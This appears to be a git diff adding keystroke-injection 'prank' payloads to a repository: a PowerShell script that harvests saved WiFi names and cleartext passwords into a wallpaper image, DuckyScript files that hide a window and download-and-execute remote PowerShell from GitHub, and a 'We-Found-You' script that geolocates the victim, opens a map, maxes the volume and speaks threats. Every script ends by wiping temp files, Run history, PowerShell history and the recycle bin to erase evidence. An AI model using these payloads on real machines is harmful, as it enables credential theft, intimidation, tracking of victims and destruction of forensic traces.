+# Get Wifi SSIDs and Passwords
+$WLANProfileNames =@()
+
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+}
+ if (!$WLANProfileObjects) { Write-Host "variable is null"
+ }else {
+
+ # This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
+
+ echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
+
+$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
+ }
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the dimension of the targets screen to make the wallpaper
+#>
+
+Add-Type @"
+using System;
+using System.Runtime.InteropServices;
+public class PInvoke {
+ [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
+ [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+}
+"@
+$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
+$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
+$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get take the information gathered and format it into a .jpg
+#>
+
+Add-Type -AssemblyName System.Drawing
+
+$filename = "$env:tmp\foo.jpg"
+$bmp = new-object System.Drawing.Bitmap $w,$h
+$font = new-object System.Drawing.Font Consolas,18
+$brushBg = [System.Drawing.Brushes]::White
+$brushFg = [System.Drawing.Brushes]::Black
+$graphics = [System.Drawing.Graphics]::FromImage($bmp)
+$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+$graphics.DrawString($content,$font,$brushFg,500,100)
+$graphics.Dispose()
+$bmp.Save($filename)
+
+# Invoke-Item $filename
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
+ Then it will clean up the files you don't want to leave behind
+#>
+
+echo $hiddenMessage > $Env:temp\foo.txt
+cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
+
+rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
+
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will take the image you generated and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#----------------------------------------------------------------------------------------------------
+
+function clean-exfil {
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+#----------------------------------------------------------------------------------------------------
+
+Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+
+clean-exfil
+
diff --git a/Payloads/Flip-Wallpaper-Troll/payload.txt b/Payloads/Flip-Wallpaper-Troll/payload.txt
new file mode 100644
index 0000000..fcb1a0a
--- /dev/null
+++ b/Payloads/Flip-Wallpaper-Troll/payload.txt
@@ -0,0 +1,20 @@
+REM Title: Wallpaper-Troll
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1; invoke-expression $pl
+DELAY 500
+ENTER
diff --git a/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg b/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg
new file mode 100644
index 0000000..f6263bc
Binary files /dev/null and b/Payloads/Flip-Wallpaper-Troll/wp-troll.jpg differ
diff --git a/Payloads/Flip-We-Found-You/README.md b/Payloads/Flip-We-Found-You/README.md
new file mode 100644
index 0000000..82ae3c0
--- /dev/null
+++ b/Payloads/Flip-We-Found-You/README.md
@@ -0,0 +1,102 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# We-Found-You
+
+This script is ready to run as is. Just download and execute with the provided link.
+
+## Description
+
+This script will get the GeoLocation (Latitude and Longitude) of your target.
+Then a page will open in their browser with a map of their current location on it
+Their system volume will be turned to max level
+And sapi speak with talk through their speakers the message provided or a custom one you provide
+
+
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+* Their location services are turned on
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1; invoke-expression $pl
+ENTER
+
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-We-Found-You)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-We-Found-You/found-you.ps1 b/Payloads/Flip-We-Found-You/found-you.ps1
new file mode 100644
index 0000000..23514fa
--- /dev/null
+++ b/Payloads/Flip-We-Found-You/found-you.ps1
@@ -0,0 +1,176 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ The targets Location Services must be turned on or this payload will not work
+
+.SYNOPSIS
+ This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
+
+.DESCRIPTION
+ This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
+ The SSID and WiFi password of any current or previously connected to networks.
+ It determines the last day they changed thier password and how many days ago.
+ Once the information is gathered the script will pause until a mouse movement is detected
+ Then the script uses Sapi speak to roast their set up and lack of security
+#>
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
+#>
+
+function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the current Latitide and Longitude of your target
+#>
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+$GL = Get-GeoLocation
+
+$GL = $GL -split " "
+
+$Lat = $GL[0].Substring(11) -replace ".$"
+
+$Lon = $GL[1].Substring(10) -replace ".$"
+
+Pause-Script
+
+# Opens their browser with a map of their current location
+
+Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
+
+Start-Sleep -s 3
+
+# Sets Volume to max level
+
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# Sets up speech module
+
+$s=New-Object -ComObject SAPI.SpVoice
+$s.Rate = -2
+$s.Speak("We found you $FN")
+$s.Speak("We know where you are")
+$s.Speak("We are everywhere")
+$s.Speak("Expect us")
+
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/Flip-We-Found-You/location.jpg b/Payloads/Flip-We-Found-You/location.jpg
new file mode 100644
index 0000000..7b6e943
Binary files /dev/null and b/Payloads/Flip-We-Found-You/location.jpg differ
diff --git a/Payloads/Flip-We-Found-You/payload.txt b/Payloads/Flip-We-Found-You/payload.txt
new file mode 100644
index 0000000..26c3101
--- /dev/null
+++ b/Payloads/Flip-We-Found-You/payload.txt
@@ -0,0 +1,16 @@
+REM Title: We-Found-You
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to open a map in your targets web browser with their current location
+REM
+REM Target: Windows 10, 11
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1; invoke-expression $pl
+ENTER